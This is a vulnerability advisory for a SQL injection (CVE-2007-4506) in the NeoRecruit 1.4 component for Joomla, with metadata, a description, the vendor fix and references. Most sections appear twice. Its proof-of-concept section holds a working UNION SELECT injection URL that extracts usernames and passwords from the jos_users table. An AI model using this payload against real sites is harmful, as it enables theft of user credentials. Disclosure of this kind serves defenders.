Joomla NeoRecruit Component SQL Injection Vulnerability
BID:25578
Info
Joomla NeoRecruit Component SQL Injection Vulnerability
| Bugtraq ID: | 25578 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4506 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 06 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: |
NeoJoomla NeoRecruit 1.4 |
| Not Vulnerable: |
NeoJoomla NeoRecruit 1.4.1 |
Discussion
Joomla NeoRecruit Component SQL Injection Vulnerability
NeoRecruit is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
NeoRecruit 1.4 and earlier versions are vulnerable.
NeoRecruit is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
NeoRecruit 1.4 and earlier versions are vulnerable.
Exploit / POC
Joomla NeoRecruit Component SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[path]//index.php?option=com_neorecruit&task=offer_view&id=[SQL Inject]
http://www.example.com/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/[path]//index.php?option=com_neorecruit&task=offer_view&id=[SQL Inject]
http://www.example.com/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*
Solution / Fix
Joomla NeoRecruit Component SQL Injection Vulnerability
Solution:
The vendor has released NeoRecruit 1.4.1 to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
Solution:
The vendor has released NeoRecruit 1.4.1 to address this issue. Contact the vendor for details on obtaining and applying the appropriate updates.
References
Joomla NeoRecruit Component SQL Injection Vulnerability
References:
References:
- Security update for NeoRecruit 1.4 (NeoJoomla)